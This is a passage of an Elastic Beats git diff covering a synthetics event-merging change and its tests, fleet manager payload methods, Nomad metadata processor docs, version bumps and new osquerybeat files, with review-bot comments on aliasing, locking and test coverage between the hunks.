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" } diff --git a/x-pack/heartbeat/monitors/browser/synthexec/synthtypes.go b/x-pack/heartbeat/monitors/browser/synthexec/synthtypes.go index 4d293d86d72..40cf2e06242 100644 --- a/x-pack/heartbeat/monitors/browser/synthexec/synthtypes.go +++ b/x-pack/heartbeat/monitors/browser/synthexec/synthtypes.go 
@@ -27,18 +27,35 @@ type SynthEvent struct { Error *SynthError `json:"error"` URL string `json:"url"` Status string `json:"status"` + RootFields common.MapStr `json:"root_fields"` index int } func (se SynthEvent) ToMap() (m common.MapStr) { // We don't add @timestamp to the map string since that's specially handled in beat.Event - m = common.MapStr{ + // Use the root fields as a base, and layer additional, stricter, fields on top + if se.RootFields != nil { + m = se.RootFields + // We handle url specially since it can be passed as a string, + // but expanded to match ECS + if urlStr, ok := m["url"].(string); ok { + if se.URL == "" { + se.URL = urlStr + } + } + } else { + m = common.MapStr{} + } + + m.DeepUpdate(common.MapStr{ "synthetics": common.MapStr{ "type": se.Type, "package_version": se.PackageVersion, - "payload": se.Payload, "index": se.index, }, + }) + if len(se.Payload) > 0 { + m.Put("synthetics.payload", se.Payload) } if se.Blob != "" { m.Put("synthetics.blob", se.Blob) @@ -61,7 +78,7 @@ func (se SynthEvent) ToMap() (m common.MapStr) { if e != nil { logp.Warn("Could not parse synthetics URL '%s': %s", se.URL, e.Error()) } else { - m["url"] = wrappers.URLFields(u) + m.Put("url", wrappers.URLFields(u)) } } diff --git a/x-pack/heartbeat/monitors/browser/synthexec/synthtypes_test.go b/x-pack/heartbeat/monitors/browser/synthexec/synthtypes_test.go index 775c5380137..daa2a710900 100644 --- a/x-pack/heartbeat/monitors/browser/synthexec/synthtypes_test.go +++ b/x-pack/heartbeat/monitors/browser/synthexec/synthtypes_test.go @@ -5,9 +5,17 @@ package synthexec import ( + "encoding/json" + "net/url" "testing" "time" + "github.com/elastic/beats/v7/heartbeat/monitors/wrappers" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/go-lookslike" + "github.com/elastic/go-lookslike/testslike" + "github.com/stretchr/testify/require" ) 
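Review bot: `m = se.RootFields` aliases the decoded map rather than copying it, so the `DeepUpdate` and `Put` calls below write `synthetics.*` and `url` back into the event's own `RootFields`. Any later reader of `se.RootFields`, or a second `ToMap()` call, then sees the merged result. Using `m = se.RootFields.Clone()` keeps ToMap free of side effects. Separately, `root_fields` is decoded from JSON (`json:"root_fields"`) and only the `synthetics` keys and `url` are overridden afterwards, so whatever emits that JSON can set any other top-level key of the event. If that is intended, a comment naming the expected keys, or a filter for reserved ones, would make the trust assumption explicit. ToMap's body continues past this hunk.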
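Review bot: The `e != nil` branch only logs, and with the earlier hunk of this commit `m` can already hold a plain string under `url` copied from `root_fields`. When `url.Parse` fails, the event therefore keeps `url` as a string instead of the `wrappers.URLFields` object, which presumably does not match the ECS-shaped field the comment in ToMap refers to. Dropping the key in the error branch, e.g. `_ = m.Delete("url")`, would avoid shipping the unparsed value. The logged `se.URL` may now also come from `root_fields`, so `%q` would be a safer verb than `'%s'` in the warning. The enclosing `if` starts outside this hunk.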
@@ -15,3 +23,117 @@ func TestSynthEventTimestamp(t *testing.T) { se := SynthEvent{TimestampEpochMicros: 1000} // 1ms require.Equal(t, time.Unix(0, int64(time.Millisecond)), se.Timestamp()) } + +func TestToMap(t *testing.T) { + testUrl, _ := url.Parse("http://testurl") + + type testCase struct { + name string + source common.MapStr + expected common.MapStr + } + + testCases := []testCase{ + { + "root fields with URL", + common.MapStr{ + "type": "journey/start", + "package_version": "1.2.3", + "root_fields": map[string]interface{}{ + "synthetics": map[string]interface{}{ + "nested": "v1", + }, + "truly_at_root": "v2", + }, + "url": testUrl.String(), + }, + common.MapStr{ + "synthetics": common.MapStr{ + "type": "journey/start", + "package_version": "1.2.3", + "nested": "v1", + }, + "url": wrappers.URLFields(testUrl), + "truly_at_root": "v2", + }, + }, + { + "root fields, step metadata", + common.MapStr{ + "type": "step/start", + "package_version": "1.2.3", + "journey": common.MapStr{"name": "MyJourney", "id": "MyJourney"}, + "step": common.MapStr{"name": "MyStep", "status": "success", "index": 42}, + "root_fields": map[string]interface{}{ + "synthetics": map[string]interface{}{ + "nested": "v1", + }, + "truly_at_root": "v2", + }, + }, + common.MapStr{ + "synthetics": common.MapStr{ + "type": "step/start", + "package_version": "1.2.3", + "nested": "v1", + "journey": common.MapStr{"name": "MyJourney", "id": "MyJourney"}, + "step": common.MapStr{"name": "MyStep", "status": "success", "index": 42}, + }, + "truly_at_root": "v2", + }, + }, + { + "weird error, and blob, no URL", + common.MapStr{ + "type": "someType", + "package_version": "1.2.3", + "journey": common.MapStr{"name": "MyJourney", "id": "MyJourney"}, + "step": common.MapStr{"name": "MyStep", "index": 42, "status": "down"}, + "error": common.MapStr{ + "name": "MyErrorName", + "message": "MyErrorMessage", + "stack": "MyErrorStack", + }, + "blob": "ablob", + "blob_mime": "application/weird", + }, + common.MapStr{ 
+ "synthetics": common.MapStr{ + "type": "someType", + "package_version": "1.2.3", + "journey": common.MapStr{"name": "MyJourney", "id": "MyJourney"}, + "step": common.MapStr{"name": "MyStep", "index": 42, "status": "down"}, + "error": common.MapStr{ + "name": "MyErrorName", + "message": "MyErrorMessage", + "stack": "MyErrorStack", + }, + "blob": "ablob", + "blob_mime": "application/weird", + }, + }, + }, + } + + for _, tc := range testCases { + t.Run(tc.name, func(t *testing.T) { + // Actually marshal to JSON and back to test the struct tags for deserialization from JSON + jsonBytes, err := json.Marshal(tc.source) + require.NoError(t, err) + se := &SynthEvent{} + err = json.Unmarshal(jsonBytes, se) + require.NoError(t, err) + + m := se.ToMap() + + // Index will always be zero in thee tests, so helpfully include it + llvalidator := lookslike.Strict(lookslike.Compose( + lookslike.MustCompile(tc.expected), + lookslike.MustCompile(common.MapStr{"synthetics": common.MapStr{"index": 0}}), + )) + + // Test that even deep maps merge correctly + testslike.Test(t, llvalidator, m) + }) + } +} diff --git a/x-pack/heartbeat/sample-synthetics-config/heartbeat.yml b/x-pack/heartbeat/sample-synthetics-config/heartbeat.yml deleted file mode 100644 index 74fc2f4d885..00000000000 --- a/x-pack/heartbeat/sample-synthetics-config/heartbeat.yml +++ /dev/null 
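Review bot: None of the three cases in TestToMap covers the precedence the ToMap comment promises ("layer additional, stricter, fields on top"). There is no case where `root_fields` carries a conflicting `synthetics.type` or `synthetics.package_version`, so a regression that lets root fields win would pass. There is also no case where `url` appears only inside `root_fields` as a string, which is the branch that copies it into `se.URL`. Adding both would pin the new behaviour. Two smaller points: `testUrl, _ := url.Parse("http://testurl")` discards the error, where `require.NoError` would be clearer, and Go naming would spell it `testURL`; the comment "Index will always be zero in thee tests" has a typo.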
@@ -1,56 +0,0 @@ ---- -heartbeat.config.monitors: - path: "${path.config}/monitors.d/*.yml" - reload.enabled: false - reload.period: 5s - -heartbeat.monitors: -- type: browser - enabled: true - id: todos-suite - name: Todos Suite - data_stream: - namespace: myns - source: - local: - path: "/home/andrewvc/projects/synthetics/examples/todos/" - schedule: '@every 1m' -- type: http - enabled: true - id: SimpleHTTP - urls: http://www.google.com - schedule: "@every 15s" - name: Simple HTTP - data_stream: - namespace: myns -- type: browser - enabled: false - id: my-monitor - name: My Monitor - data_stream: - namespace: myns - source: - inline: - script: - step("load homepage", async () => { - await page.goto('https://www.elastic.co'); - }); - step("hover over products menu", async () => { - await page.hover('css=[data-nav-item=products]'); - }); - step("failme", async () => { - await page.hhover('css=[data-nav-item=products]'); - }); - schedule: "@every 1m" - -setup.template.settings: - index.number_of_shards: 1 - index.codec: best_compression -setup.kibana: -output.elasticsearch: - hosts: "127.0.0.1:9200" - username: elastic - password: changeme -processors: -- add_observer_metadata: - diff --git a/x-pack/libbeat/Dockerfile b/x-pack/libbeat/Dockerfile index 0c51c2ea88f..17810925ee0 100644 --- a/x-pack/libbeat/Dockerfile +++ b/x-pack/libbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/x-pack/libbeat/management/fleet/manager.go b/x-pack/libbeat/management/fleet/manager.go index 8aec0af1800..8ec84c10579 100644 --- a/x-pack/libbeat/management/fleet/manager.go +++ b/x-pack/libbeat/management/fleet/manager.go @@ -39,6 +39,7 @@ type Manager struct { lock sync.Mutex status management.Status msg string + payload map[string]interface{} stopFunc func() } 
@@ -173,7 +174,21 @@ func (cm *Manager) OnConfig(s string) { return } - cm.client.Status(proto.StateObserved_HEALTHY, "Running", nil) + cm.client.Status(proto.StateObserved_HEALTHY, "Running", cm.payload) +} + +func (cm *Manager) RegisterAction(action client.Action) { + cm.client.RegisterAction(action) +} + +func (cm *Manager) UnregisterAction(action client.Action) { + cm.client.UnregisterAction(action) +} + +func (cm *Manager) SetPayload(payload map[string]interface{}) { + cm.lock.Lock() + cm.payload = payload + cm.lock.Unlock() } func (cm *Manager) OnStop() { diff --git a/x-pack/libbeat/management/manager.go b/x-pack/libbeat/management/manager.go index e9dbf7511a4..cfbf72f234c 100644 --- a/x-pack/libbeat/management/manager.go +++ b/x-pack/libbeat/management/manager.go @@ -10,6 +10,7 @@ import ( "time" "github.com/elastic/beats/v7/libbeat/common/reload" + "github.com/elastic/elastic-agent-client/v7/pkg/client" "github.com/gofrs/uuid" @@ -115,6 +116,12 @@ func (cm *ConfigManager) Enabled() bool { return cm.config.Enabled } +func (cm *ConfigManager) RegisterAction(action client.Action) {} + +func (cm *ConfigManager) UnregisterAction(action client.Action) {} + +func (cm *ConfigManager) SetPayload(map[string]interface{}) {} + // Start the config manager func (cm *ConfigManager) Start(_ func()) { if !cm.Enabled() { diff --git a/x-pack/libbeat/processors/add_nomad_metadata/docs/add_nomad_metadata.asciidoc b/x-pack/libbeat/processors/add_nomad_metadata/docs/add_nomad_metadata.asciidoc new file mode 100644 index 00000000000..1ab6b8cab03 --- /dev/null +++ b/x-pack/libbeat/processors/add_nomad_metadata/docs/add_nomad_metadata.asciidoc 
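Review bot: In fleet/manager.go, `SetPayload` writes `cm.payload` under `cm.lock`, but the changed line in `OnConfig` reads it in `cm.client.Status(proto.StateObserved_HEALTHY, "Running", cm.payload)` with no lock visible around the call, so a concurrent `SetPayload` would race with it; OnConfig's body starts outside this hunk, so confirm whether the lock is already held there. If it is not, take a snapshot first, `cm.lock.Lock(); payload := cm.payload; cm.lock.Unlock()`, and pass `payload` to `Status`. `SetPayload` also keeps the caller's map by reference, so later mutation by the caller is visible to the status report; copy the map if isolation is intended. The new exported methods `RegisterAction`, `UnregisterAction` and `SetPayload` have no doc comments.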
@@ -0,0 +1,166 @@ +[[add-nomad-metadata]] +[role="xpack"] +=== Add Nomad metadata + +++++ +add_nomad_metadata +++++ + +experimental[] + +The `add_nomad_metadata` processor adds fields with relevant metadata for +applications deployed in Nomad. + +Each event is annotated with the following information: + +* Allocation name, identifier and status. +* Job name and type. +* Namespace where the job is deployed. +* Datacenter and region where the agent runnning the allocation is located. + +[source,yaml] +------------------------------------------------------------------------------- +processors: + - add_nomad_metadata: ~ +------------------------------------------------------------------------------- + +It has the following settings to configure the connection: + +`address`:: (Optional) The URL of the agent API used to request the metadata. It +uses `http://127.0.0.1:4646` by default. +`namespace`:: (Optional) Namespace to watch. If set, only events for allocations +in this namespace will be annotated. +`region`:: (Optional) Region to watch. If set, only events for allocations in +this region will be annotated. +`secretID`:: (Optional) SecretID to use when connecting with the agent API. +`refresh_interval`:: (Optional) Interval used to updated the cached metadata. It +defaults to 30 seconds. +`cleanup_timeout`:: (Optional) After an allocation has been removed, time to +wait before cleaning up their associated resources. This is useful if you expect +to receive events after an allocation has been removed, what can happen when +collecting logs. It defaults to 60 seconds. + + +You can decide if {beatname_uc} should annotate events related to allocations in +local node or on the whole cluster configuring the scope with the following +settings: + +`scope`:: (Optional) Scope of the resources to watch. It can be `node` to get +metadata only for the allocations in a single agent, or `global`, to get metadata +for allocations running on any agent. It defaults to `node`. 
+`node`:: (Optional) When using `scope: node`, use `node` to specify the name of +the local node if it cannot be discovered automatically. + +For example the following configuration could be used if {beatname_uc} is +collecting events from all the allocations in the cluster: + +[source,yaml] +------------------------------------------------------------------------------- +processors: + - add_nomad_metadata: + scope: global +------------------------------------------------------------------------------- + +==== Indexers and matchers + +Indexers and matchers are used to correlate fields in events with actual +metadata. {beatname_uc} uses this information to know what metadata to include +in each event. + +===== Indexers + +Indexers use allocation metadata to create unique identifiers for each one of +the pods. + +Avaliable indexers are: +`allocation_name`:: Identifies allocations by its name and namespace (as +`/) +`allocation_uuid`:: Identifies allocations by its unique identifier. +// Review examples below when new indexers are added with network information. + +===== Matchers + +Matchers are used to construct the lookup keys that match with the identifiers +created by indexes. + +===== `field_format` + +Looks up allocation metadata using a key created with a string format that can include +event fields. + +This matcher has an option `format` to define the string format. This string +format can contain placeholders for any field in the event. + +For example, the following configuration uses the `allocation_name` indexer to identify +the allocation metadata by its name and namespace, and uses custom fields +existing in the event as match keys: + +[source,yaml] +------------------------------------------------------------------------------- +processors: +- add_nomad_metadata: + ... 
+ default_indexers.enabled: false + default_matchers.enabled: false + indexers: + - allocation_name: + matchers: + - field_format: + format: '%{[labels.nomad_namespace]}/%{[fields.nomad_alloc_name]}' +------------------------------------------------------------------------------- + +===== `fields` + +Looks up allocation metadata using as key the value of some specific fields. When +multiple fields are defined, the first one included in the event is used. + +This matcher has an option `lookup_fields` to define the fields whose value will +be used for lookup. + +For example, the following configuration uses the `allocation_uuid` indexer to +identify allocations, and defines a matcher that uses some fields where the +allocation UUID can be found for lookup, the first it finds in the event: + +[source,yaml] +------------------------------------------------------------------------------- +processors: +- add_nomad_metadata: + ... + default_indexers.enabled: false + default_matchers.enabled: false + indexers: + - allocation_uuid: + matchers: + - fields: + lookup_fields: ['host.name', 'fields.nomad_alloc_uuid'] +------------------------------------------------------------------------------- + +ifdef::has_nomad_logs_path_matcher[] +===== `logs_path` + +Looks up allocation metadata using identifiers extracted from the log path stored in +the `log.file.path` field. + +This matcher has an optional `logs_path` option with the base path of the +directory containing the logs for the local agent. + +The default configuration is able to lookup the metadata using the allocation +UUID when the logs are collected under `/var/lib/nomad`. + +For example the following configuration would use the allocation UUID when the logs +are collected from `/var/lib/NomadClient001/alloc//alloc/logs/...`. + +[source,yaml] +------------------------------------------------------------------------------- +processors: +- add_nomad_metadata: + ... 
+ default_indexers.enabled: false + default_matchers.enabled: false + indexers: + - allocation_uuid: + matchers: + - logs_path: + logs_path: '/var/lib/NomadClient001' +------------------------------------------------------------------------------- +endif::has_nomad_logs_path_matcher[] diff --git a/x-pack/metricbeat/cmd/root.go b/x-pack/metricbeat/cmd/root.go index c1822a428b8..242657049be 100644 --- a/x-pack/metricbeat/cmd/root.go +++ b/x-pack/metricbeat/cmd/root.go @@ -31,7 +31,7 @@ const ( Name = "metricbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // RootCmd to handle beats cli diff --git a/x-pack/metricbeat/metricbeat.reference.yml b/x-pack/metricbeat/metricbeat.reference.yml index be76277068f..4b4d7f76e48 100644 --- a/x-pack/metricbeat/metricbeat.reference.yml +++ b/x-pack/metricbeat/metricbeat.reference.yml @@ -787,6 +787,10 @@ metricbeat.modules: #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: @@ -1120,6 +1124,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/x-pack/osquerybeat/.editorconfig b/x-pack/osquerybeat/.editorconfig new file mode 100644 index 00000000000..a92dc2185bd --- /dev/null +++ b/x-pack/osquerybeat/.editorconfig 
@@ -0,0 +1,27 @@ +# See: http://editorconfig.org +root = true + +[*] +charset = utf-8 +end_of_line = lf +insert_final_newline = true +trim_trailing_whitespace = true + +[*.json] +indent_size = 4 +indent_style = space + +[*.py] +indent_style = space +indent_size = 4 + +[*.yml] +indent_style = space +indent_size = 2 + +[Makefile] +indent_style = tab + +[Vagrantfile] +indent_size = 2 +indent_style = space diff --git a/x-pack/osquerybeat/.gitignore b/x-pack/osquerybeat/.gitignore new file mode 100644 index 00000000000..6903d360c78 --- /dev/null +++ b/x-pack/osquerybeat/.gitignore @@ -0,0 +1,11 @@ +/.idea +/build + +.DS_Store +/osquerybeat +/osquerybeat.test +*.pyc + +# Ignore Osquery artifacts that could be created during development +/osqueryd +/osquery/ \ No newline at end of file diff --git a/x-pack/osquerybeat/Jenkinsfile.yml b/x-pack/osquerybeat/Jenkinsfile.yml new file mode 100644 index 00000000000..d3c591e0d7e --- /dev/null +++ b/x-pack/osquerybeat/Jenkinsfile.yml 
@@ -0,0 +1,67 @@ +when: + branches: true ## for all the branches + changeset: ## when PR contains any of those entries in the changeset + - "^x-pack/osquerybeat/.*" + - "@ci" ## special token regarding the changeset for the ci + - "@xpack" ## special token regarding the changeset for the xpack + comments: ## when PR comment contains any of those entries + - "/test x-pack/osquerybeat" + labels: ## when PR labels matches any of those entries + - "x-pack-osquerybeat" + parameters: ## when parameter was selected in the UI. + - "x-pack-osquerybeat" + tags: true ## for all the tags +platform: "immutable && ubuntu-18" ## default label for all the stages +stages: + Lint: + make: | + make -C x-pack/osquerybeat check; + make -C x-pack/osquerybeat update; + make check-no-changes; + build: + mage: "mage build test" + macos: + mage: "mage build unitTest" + platforms: ## override default label in this specific stage. + - "macosx&&x86_64" + when: ## Override the top-level when. + comments: + - "/test x-pack/osquerybeat for macos" + labels: + - "macOS" + parameters: + - "macosTest" + branches: true ## for all the branches + tags: true ## for all the tags + windows: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-2019" + windows-2016: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-2016" + windows-2012: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-2012-r2" + windows-10: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-10" + windows-2008: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-2008-r2" + windows-8: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. 
